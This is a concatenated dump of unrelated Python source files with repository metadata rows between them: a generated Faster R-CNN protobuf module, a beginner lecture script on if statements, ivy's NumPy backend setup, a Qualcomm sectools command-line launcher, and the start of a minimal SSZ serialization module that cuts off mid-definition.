\x01(\x05:\x02\x36\x34\x12+\n\x1dsecond_stage_balance_fraction\x18\x17 \x01(\x02:\x04\x30.25\x12M\n\x1csecond_stage_post_processing\x18\x18 \x01(\x0b\x32\'.object_detection.protos.PostProcessing\x12\x30\n%second_stage_localization_loss_weight\x18\x19 \x01(\x02:\x01\x31\x12\x32\n\'second_stage_classification_loss_weight\x18\x1a \x01(\x02:\x01\x31\x12\x33\n(second_stage_mask_prediction_loss_weight\x18\x1b \x01(\x02:\x01\x31\x12\x45\n\x12hard_example_miner\x18\x1c \x01(\x0b\x32).object_detection.protos.HardExampleMiner\x12U\n second_stage_classification_loss\x18\x1d \x01(\x0b\x32+.object_detection.protos.ClassificationLoss\x12\'\n\x18inplace_batchnorm_update\x18\x1e \x01(\x08:\x05\x66\x61lse\x12)\n\x1ause_matmul_crop_and_resize\x18\x1f \x01(\x08:\x05\x66\x61lse\x12$\n\x15\x63lip_anchors_to_image\x18 \x01(\x08:\x05\x66\x61lse\x12+\n\x1cuse_matmul_gather_in_matcher\x18! \x01(\x08:\x05\x66\x61lse\x12\x30\n!use_static_balanced_label_sampler\x18\" \x01(\x08:\x05\x66\x61lse\x12 \n\x11use_static_shapes\x18# \x01(\x08:\x05\x66\x61lse\x12\x1a\n\x0cresize_masks\x18$ \x01(\x08:\x04true\x12)\n\x1ause_static_shapes_for_eval\x18% \x01(\x08:\x05\x66\x61lse\x12\x30\n\"use_partitioned_nms_in_first_stage\x18& \x01(\x08:\x04true\x12\x33\n$return_raw_detections_during_predict\x18\' \x01(\x08:\x05\x66\x61lse\x12.\n\x1fuse_combined_nms_in_first_stage\x18( \x01(\x08:\x05\x66\x61lse\"x\n\x1a\x46\x61sterRcnnFeatureExtractor\x12\x0c\n\x04type\x18\x01 \x01(\t\x12\'\n\x1b\x66irst_stage_features_stride\x18\x02 \x01(\x05:\x02\x31\x36\x12#\n\x14\x62\x61tch_norm_trainable\x18\x03 \x01(\x08:\x05\x66\x61lse')
,
dependencies=[object__detection_dot_protos_dot_anchor__generator__pb2.DESCRIPTOR,object__detection_dot_protos_dot_box__predictor__pb2.DESCRIPTOR,object__detection_dot_protos_dot_hyperparams__pb2.DESCRIPTOR,object__detection_dot_protos_dot_image__resizer__pb2.DESCRIPTOR,object__detection_dot_protos_dot_losses__pb2.DESCRIPTOR,object__detection_dot_protos_dot_post__processing__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_FASTERRCNN = _descriptor.Descriptor(
name='FasterRcnn',
full_name='object_detection.protos.FasterRcnn',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='number_of_stages', full_name='object_detection.protos.FasterRcnn.number_of_stages', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=2,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='num_classes', full_name='object_detection.protos.FasterRcnn.num_classes', index=1,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='image_resizer', full_name='object_detection.protos.FasterRcnn.image_resizer', index=2,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='feature_extractor', full_name='object_detection.protos.FasterRcnn.feature_extractor', index=3,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='first_stage_anchor_generator', full_name='object_detection.protos.FasterRcnn.first_stage_anchor_generator', index=4,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='first_stage_atrous_rate', full_name='object_detection.protos.FasterRcnn.first_stage_atrous_rate', index=5,
number=7, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=1,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='first_stage_box_predictor_conv_hyperparams', full_name='object_detection.protos.FasterRcnn.first_stage_box_predictor_conv_hyperparams', index=6,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='first_stage_box_predictor_kernel_size', full_name='object_detection.protos.FasterRcnn.first_stage_box_predictor_kernel_size', index=7,
number=9, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=3,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='first_stage_box_predictor_depth', full_name='object_detection.protos.FasterRcnn.first_stage_box_predictor_depth', index=8,
number=10, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=512,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='first_stage_minibatch_size', full_name='object_detection.protos.FasterRcnn.first_stage_minibatch_size', index=9,
number=11, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=256,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='first_stage_positive_balance_fraction', full_name='object_detection.protos.FasterRcnn.first_stage_positive_balance_fraction', index=10,
number=12, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.5),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='first_stage_nms_score_threshold', full_name='object_detection.protos.FasterRcnn.first_stage_nms_score_threshold', index=11,
number=13, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='first_stage_nms_iou_threshold', full_name='object_detection.protos.FasterRcnn.first_stage_nms_iou_threshold', index=12,
number=14, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.7),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='first_stage_max_proposals', full_name='object_detection.protos.FasterRcnn.first_stage_max_proposals', index=13,
number=15, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=300,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='first_stage_localization_loss_weight', full_name='object_detection.protos.FasterRcnn.first_stage_localization_loss_weight', index=14,
number=16, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(1),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='first_stage_objectness_loss_weight', full_name='object_detection.protos.FasterRcnn.first_stage_objectness_loss_weight', index=15,
number=17, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(1),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='initial_crop_size', full_name='object_detection.protos.FasterRcnn.initial_crop_size', index=16,
number=18, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='maxpool_kernel_size', full_name='object_detection.protos.FasterRcnn.maxpool_kernel_size', index=17,
number=19, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='maxpool_stride', full_name='object_detection.protos.FasterRcnn.maxpool_stride', index=18,
number=20, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='second_stage_box_predictor', full_name='object_detection.protos.FasterRcnn.second_stage_box_predictor', index=19,
number=21, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='second_stage_batch_size', full_name='object_detection.protos.FasterRcnn.second_stage_batch_size', index=20,
number=22, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=64,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='second_stage_balance_fraction', full_name='object_detection.protos.FasterRcnn.second_stage_balance_fraction', index=21,
number=23, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.25),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='second_stage_post_processing', full_name='object_detection.protos.FasterRcnn.second_stage_post_processing', index=22,
number=24, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='second_stage_localization_loss_weight', full_name='object_detection.protos.FasterRcnn.second_stage_localization_loss_weight', index=23,
number=25, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(1),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='second_stage_classification_loss_weight', full_name='object_detection.protos.FasterRcnn.second_stage_classification_loss_weight', index=24,
number=26, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(1),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='second_stage_mask_prediction_loss_weight', full_name='object_detection.protos.FasterRcnn.second_stage_mask_prediction_loss_weight', index=25,
number=27, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(1),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='hard_example_miner', full_name='object_detection.protos.FasterRcnn.hard_example_miner', index=26,
number=28, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='second_stage_classification_loss', full_name='object_detection.protos.FasterRcnn.second_stage_classification_loss', index=27,
number=29, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='inplace_batchnorm_update', full_name='object_detection.protos.FasterRcnn.inplace_batchnorm_update', index=28,
number=30, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='use_matmul_crop_and_resize', full_name='object_detection.protos.FasterRcnn.use_matmul_crop_and_resize', index=29,
number=31, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='clip_anchors_to_image', full_name='object_detection.protos.FasterRcnn.clip_anchors_to_image', index=30,
number=32, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='use_matmul_gather_in_matcher', full_name='object_detection.protos.FasterRcnn.use_matmul_gather_in_matcher', index=31,
number=33, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='use_static_balanced_label_sampler', full_name='object_detection.protos.FasterRcnn.use_static_balanced_label_sampler', index=32,
number=34, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='use_static_shapes', full_name='object_detection.protos.FasterRcnn.use_static_shapes', index=33,
number=35, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='resize_masks', full_name='object_detection.protos.FasterRcnn.resize_masks', index=34,
number=36, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=True,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='use_static_shapes_for_eval', full_name='object_detection.protos.FasterRcnn.use_static_shapes_for_eval', index=35,
number=37, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='use_partitioned_nms_in_first_stage', full_name='object_detection.protos.FasterRcnn.use_partitioned_nms_in_first_stage', index=36,
number=38, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=True,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='return_raw_detections_during_predict', full_name='object_detection.protos.FasterRcnn.return_raw_detections_during_predict', index=37,
number=39, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='use_combined_nms_in_first_stage', full_name='object_detection.protos.FasterRcnn.use_combined_nms_in_first_stage', index=38,
number=40, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=337,
serialized_end=2262,
)
_FASTERRCNNFEATUREEXTRACTOR = _descriptor.Descriptor(
name='FasterRcnnFeatureExtractor',
full_name='object_detection.protos.FasterRcnnFeatureExtractor',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='object_detection.protos.FasterRcnnFeatureExtractor.type', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='first_stage_features_stride', full_name='object_detection.protos.FasterRcnnFeatureExtractor.first_stage_features_stride', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=16,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='batch_norm_trainable', full_name='object_detection.protos.FasterRcnnFeatureExtractor.batch_norm_trainable', index=2,
number=3, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2264,
serialized_end=2384,
)
_FASTERRCNN.fields_by_name['image_resizer'].message_type = object__detection_dot_protos_dot_image__resizer__pb2._IMAGERESIZER
_FASTERRCNN.fields_by_name['feature_extractor'].message_type = _FASTERRCNNFEATUREEXTRACTOR
_FASTERRCNN.fields_by_name['first_stage_anchor_generator'].message_type = object__detection_dot_protos_dot_anchor__generator__pb2._ANCHORGENERATOR
_FASTERRCNN.fields_by_name['first_stage_box_predictor_conv_hyperparams'].message_type = object__detection_dot_protos_dot_hyperparams__pb2._HYPERPARAMS
_FASTERRCNN.fields_by_name['second_stage_box_predictor'].message_type = object__detection_dot_protos_dot_box__predictor__pb2._BOXPREDICTOR
_FASTERRCNN.fields_by_name['second_stage_post_processing'].message_type = object__detection_dot_protos_dot_post__processing__pb2._POSTPROCESSING
_FASTERRCNN.fields_by_name['hard_example_miner'].message_type = object__detection_dot_protos_dot_losses__pb2._HARDEXAMPLEMINER
_FASTERRCNN.fields_by_name['second_stage_classification_loss'].message_type = object__detection_dot_protos_dot_losses__pb2._CLASSIFICATIONLOSS
DESCRIPTOR.message_types_by_name['FasterRcnn'] = _FASTERRCNN
DESCRIPTOR.message_types_by_name['FasterRcnnFeatureExtractor'] = _FASTERRCNNFEATUREEXTRACTOR
FasterRcnn = _reflection.GeneratedProtocolMessageType('FasterRcnn', (_message.Message,), dict(
DESCRIPTOR = _FASTERRCNN,
__module__ = 'object_detection.protos.faster_rcnn_pb2'
# @@protoc_insertion_point(class_scope:object_detection.protos.FasterRcnn)
))
_sym_db.RegisterMessage(FasterRcnn)
FasterRcnnFeatureExtractor = _reflection.GeneratedProtocolMessageType('FasterRcnnFeatureExtractor', (_message.Message,), dict(
DESCRIPTOR = _FASTERRCNNFEATUREEXTRACTOR,
__module__ = 'object_detection.protos.faster_rcnn_pb2'
# @@protoc_insertion_point(class_scope:object_detection.protos.FasterRcnnFeatureExtractor)
))
_sym_db.RegisterMessage(FasterRcnnFeatureExtractor)
# @@protoc_insertion_point(module_scope)
| 60.514851 | 3,525 | 0.780023 |
ab33c48fcc05959299f6199a080330f336eb5098
| 917 |
py
|
Python
|
lec5.py
|
A-Glavin/ia241-github
|
c8371d2cdcceac0fa146b798caafc4d2db9c7e74
|
[
"MIT"
] | null | null | null |
lec5.py
|
A-Glavin/ia241-github
|
c8371d2cdcceac0fa146b798caafc4d2db9c7e74
|
[
"MIT"
] | null | null | null |
lec5.py
|
A-Glavin/ia241-github
|
c8371d2cdcceac0fa146b798caafc4d2db9c7e74
|
[
"MIT"
] | null | null | null |
'''
lec5 if statement
'''
import this
print( 2+
1)
print([1,2,3,
4,5,6])
m = 1+\
2
print(m)
a= [1,2,3]
b= [1,2,3,]
print(id([1, 2, 3]))
print(id(a))
print(id(b))
print(a is b)
print(a==b)
x = None
print(id(x))
print(id(None))
print(x is None)
print(x == None)
y = []
print(y == None)
print(y is None)
print( True and False )
print( True or False )
print(not True)
print(not False)
print(not None)
print(not '0')
print(() and [])
print([] and ())
print(-1 or 0)
print(0 or -1)
print(y == None)
print(y is None)
print( True and False)
print(not True)
print(not False)
print(not None)
print(not '0')
if 2>1 :
print('2>1')
if 3>1:
print('3>1')
if 2<1:
print('2<1')
print('not in the if block')
if 2<=1:
print('2<=1')
else:
print('2>2')
if 2<1:
print('2<1')
elif 2<=2:
print('2<=2')
else:
print('2>1')
| 10.54023 | 28 | 0.522356 |
68946bc037eb655c8a3a25dd801402047731c7cb
| 2,932 |
py
|
Python
|
ivy/functional/backends/numpy/__init__.py
|
RitujaPawas/ivy
|
595788507aca609e868cb3d17edd815463af28e4
|
[
"Apache-2.0"
] | null | null | null |
ivy/functional/backends/numpy/__init__.py
|
RitujaPawas/ivy
|
595788507aca609e868cb3d17edd815463af28e4
|
[
"Apache-2.0"
] | null | null | null |
ivy/functional/backends/numpy/__init__.py
|
RitujaPawas/ivy
|
595788507aca609e868cb3d17edd815463af28e4
|
[
"Apache-2.0"
] | null | null | null |
# global
import sys
import numpy as np
# local
import ivy
# noinspection PyUnresolvedReferences
use = ivy.backend_handler.ContextManager(sys.modules[__name__])
NativeArray = np.ndarray
NativeVariable = np.ndarray
NativeDevice = str
NativeDtype = np.dtype
# data types
int8 = ivy.IntDtype("int8")
int16 = ivy.IntDtype("int16")
int32 = ivy.IntDtype("int32")
int64 = ivy.IntDtype("int64")
uint8 = ivy.IntDtype("uint8")
uint16 = ivy.IntDtype("uint16")
uint32 = ivy.IntDtype("uint32")
uint64 = ivy.IntDtype("uint64")
bfloat16 = ivy.FloatDtype("bfloat16")
float16 = ivy.FloatDtype("float16")
float32 = ivy.FloatDtype("float32")
float64 = ivy.FloatDtype("float64")
# noinspection PyShadowingBuiltins
bool = "bool"
nan = float("nan")
inf = float("inf")
# native data types
native_int8 = np.dtype("int8")
native_int16 = np.dtype("int16")
native_int32 = np.dtype("int32")
native_int64 = np.dtype("int64")
native_uint8 = np.dtype("uint8")
native_uint16 = np.dtype("uint16")
native_uint32 = np.dtype("uint32")
native_uint64 = np.dtype("uint64")
native_float16 = np.dtype("float16")
native_float32 = np.dtype("float32")
native_float64 = np.dtype("float64")
# noinspection PyShadowingBuiltins
native_bool = np.dtype("bool")
valid_dtypes = (
int8,
int16,
int32,
int64,
uint8,
uint16,
uint32,
uint64,
float16,
float32,
float64,
bool,
)
valid_numeric_dtypes = (
int8,
int16,
int32,
int64,
uint8,
uint16,
uint32,
uint64,
float16,
float32,
float64,
)
valid_int_dtypes = (int8, int16, int32, int64, uint8, uint16, uint32, uint64)
valid_float_dtypes = (float16, float32, float64)
# invalid
invalid_dtypes = (bfloat16,)
invalid_numeric_dtypes = (bfloat16,)
invalid_int_dtypes = ()
invalid_float_dtypes = (bfloat16,)
def closest_valid_dtype(type):
if type is None:
return ivy.default_dtype()
type_str = ivy.as_ivy_dtype(type)
if type_str in invalid_dtypes:
return {"bfloat16": float16}[type_str]
return type
backend = "numpy"
# local sub-modules
from . import activations
from .activations import *
from . import compilation
from .compilation import *
from . import creation
from .creation import *
from . import data_type
from .data_type import *
from . import device
from .device import *
from . import elementwise
from .elementwise import *
from . import general
from .general import *
from . import gradients
from .gradients import *
from . import image
from .image import *
from . import layers
from .layers import *
from . import linear_algebra as linalg
from .linear_algebra import *
from . import manipulation
from .manipulation import *
from . import random
from .random import *
from . import searching
from .searching import *
from . import set
from .set import *
from . import sorting
from .sorting import *
from . import statistical
from .statistical import *
from . import utility
from .utility import *
| 21.718519 | 77 | 0.723738 |
d4dc12b31063b67d34473c2f2db4240f9785ddf0
| 8,198 |
py
|
Python
|
QCA4020_SDK/target/sectools/qdn/sectools.py
|
r8d8/lastlock
|
78c02e5fbb129b1bc4147bd55eec2882267d7e87
|
[
"Apache-2.0"
] | null | null | null |
QCA4020_SDK/target/sectools/qdn/sectools.py
|
r8d8/lastlock
|
78c02e5fbb129b1bc4147bd55eec2882267d7e87
|
[
"Apache-2.0"
] | null | null | null |
QCA4020_SDK/target/sectools/qdn/sectools.py
|
r8d8/lastlock
|
78c02e5fbb129b1bc4147bd55eec2882267d7e87
|
[
"Apache-2.0"
] | null | null | null |
# ===============================================================================
#
# Copyright (c) 2013-2018 Qualcomm Technologies, Inc.
# All Rights Reserved.
# Copyright (c) 2018 Qualcomm Technologies, Inc.
# All rights reserved.
# Redistribution and use in source and binary forms, with or without modification, are permitted (subject to the limitations in the disclaimer below)
# provided that the following conditions are met:
# Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
# Neither the name of Qualcomm Technologies, Inc. nor the names of its contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
# NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY THIS LICENSE.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Provides a command line interface to the services provided by sectools
.. data:: SECTOOLS_TOOL_NAME
Name of the tool
.. data:: SECTOOLS_TOOL_VERSION
Version of the tool
"""
import os
import sys
import optparse
import traceback
from sectools import SECTOOLS_TOOL_NAME
from sectools import SECTOOLS_TOOL_VERSION
from sectools.common.utils.c_logging import logger
# List of features
FEATURES_LIST = []
sectools_features_package_name = "sectools.features"
sectools_features_path = os.path.join(
os.path.realpath(os.path.dirname(__file__)),
*(sectools_features_package_name.split(".")))
for module_name in os.listdir(sectools_features_path):
def import_features(module_path):
""" Import all features under the module path recursively.
:param module_path:
Python module path, such as sectools.features.isc.
It is already imported, and all its attributes are visible.
The __init__.py file of a module to be imported could have
only either or both attributes, the singular __sectools_feature__,
and the plural __sectools_features__. The former is a string
referring to a potential feature Python module file, while the
latter is a list of strings referring to their respective
potential feature Python module files or packages. Again, they
are candidates. The logic implemented here determines whether
the feature candidate is actually imported as a sectools feature.
If neither attributes is present, then no feature is imported.
"""
if hasattr(sys.modules[module_path], "__sectools_features__"):
for feature_package in getattr(
sys.modules[module_path], "__sectools_features__"):
feature_module_path = ".".join([module_path, feature_package])
try:
__import__(feature_module_path)
except ImportError:
continue
import_features(feature_module_path)
if hasattr(sys.modules[module_path], "__sectools_feature__"):
feature_name = getattr(sys.modules[module_path],
"__sectools_feature__")
__import__(".".join([module_path, feature_name]))
feature = getattr(sys.modules[module_path], feature_name)
FEATURES_LIST.append(feature)
if not os.path.isdir(os.path.join(sectools_features_path, module_name)):
continue
if hasattr(sectools_features_package_name, module_name):
continue
module_path = ".".join([sectools_features_package_name, module_name])
try:
__import__(module_path)
except ImportError:
continue
import_features(module_path)
if not FEATURES_LIST:
raise RuntimeError('Sectools could not find any packaged features')
__version__ = SECTOOLS_TOOL_NAME + ' ' + SECTOOLS_TOOL_VERSION
class SectoolsParser(optparse.OptionParser):
"""Parser for command line arguments supported by Sectools."""
def __init__(self):
# Initialize the base parser
optparse.OptionParser.__init__(self, usage=self.c_usage,
description=self.c_description,
version=self.c_version,
epilog=self.c_epilog)
self.c_add_options()
self.opt_args, self.pos_args = self.parse_args(args=sys.argv[:2])
if len(self.pos_args) == 1:
self.print_help(sys.stdout)
@property
def c_usage(self):
"""(str) Returns the usage of the program.
"""
return self.c_prog + ' [feature]'
@property
def c_prog(self):
"""(str) Returns the name of the program. By default this is the name
of the python file being executed.
"""
return os.path.basename(sys.argv[0])
@property
def c_description(self):
"""(str) Returns the description of the program."""
return 'This program provides an interface to the sectools features'
@property
def c_version(self):
"""(str) Returns the version of the program."""
return __version__
@property
def c_epilog(self):
"""(str) Returns the epilog for the program."""
feature_command_names = sorted(
[f.CMD_ARG_TOOL_NAME for f in FEATURES_LIST])
features = "\n".join(' %d. %s' % (idx, feature_name) for
idx, feature_name in
enumerate(feature_command_names, start=1))
example = self.c_prog + ' ' + feature_command_names[-1] + ' -h'
return """
Features available for sectools are:
{features}
Example usage:
{example}
""".format(features=features, example=example)
def format_epilog(self, formatter):
"""This method is implemented to override the OptionParser's formatting
of the epilog"""
return self.epilog
def c_add_options(self):
"""Adds the command line args supported by sectools."""
pass
def main(args):
"""Parses the command line arguments, performs any basic operations based on
the parsed arguments and starts processing using the isc module.
"""
# Print the tool's launch command
logger.debug2('\n\n Sectools launched as: "' + ' '.join(sys.argv) + '"\n')
if len(args) > 1:
feature = args[1]
for supported_feature in FEATURES_LIST:
if feature == supported_feature.CMD_ARG_TOOL_NAME:
supported_feature.main(supported_feature.parse_args(sys.argv[1:]))
break
else:
raise RuntimeError(
'Feature provided from command line: "' + feature + '" is invalid.' + '\n'
' ' + 'Please choose from : ' + str([f.CMD_ARG_TOOL_NAME for f in FEATURES_LIST]))
if __name__ == '__main__':
try:
# Check that the command line are valid and are normalized.
args = SectoolsParser().pos_args
main(args)
except Exception:
logger.error(traceback.format_exc())
logger.error(sys.exc_info()[1])
sys.exit(1)
except KeyboardInterrupt:
print
logger.error('Keyboard Interrupt Received. Exiting!')
sys.exit(1)
sys.exit(0)
| 38.130233 | 149 | 0.664064 |
a4e74801f0e174743bf232e97dbdd268a0b10de0
| 6,422 |
py
|
Python
|
spec_pythonizer/minimal_ssz.py
|
hwwhww/research
|
4bde287aae017cd93fa936f587f21cddcc7c4129
|
[
"MIT"
] | 1 |
2020-07-22T14:50:53.000Z
|
2020-07-22T14:50:53.000Z
|
spec_pythonizer/minimal_ssz.py
|
hwwhww/research
|
4bde287aae017cd93fa936f587f21cddcc7c4129
|
[
"MIT"
] | null | null | null |
spec_pythonizer/minimal_ssz.py
|
hwwhww/research
|
4bde287aae017cd93fa936f587f21cddcc7c4129
|
[
"MIT"
] | null | null | null |
from hashlib import sha256
def hash(x): return sha256(x).digest()
BYTES_PER_CHUNK = 32
BYTES_PER_LENGTH_PREFIX = 4
ZERO_CHUNK = b'\x00' * BYTES_PER_CHUNK
def SSZType(fields):
class SSZObject():
def __init__(self, **kwargs):
for f in fields:
if f not in kwargs:
raise Exception("Missing constructor argument: %s" % f)
setattr(self, f, kwargs[f])
def __eq__(self, other):
return (
self.fields == other.fields and
self.serialize() == other.serialize()
)
def __hash__(self):
return int.from_bytes(self.hash_tree_root(), byteorder="little")
def __str__(self):
output = []
for field in self.fields:
output.append(f'{field}: {getattr(self, field)}')
return "\n".join(output)
def serialize(self):
return serialize(self, self.__class__)
def hash_tree_root(self):
return hash_tree_root(self, self.__class__)
SSZObject.fields = fields
return SSZObject
def is_basic(typ):
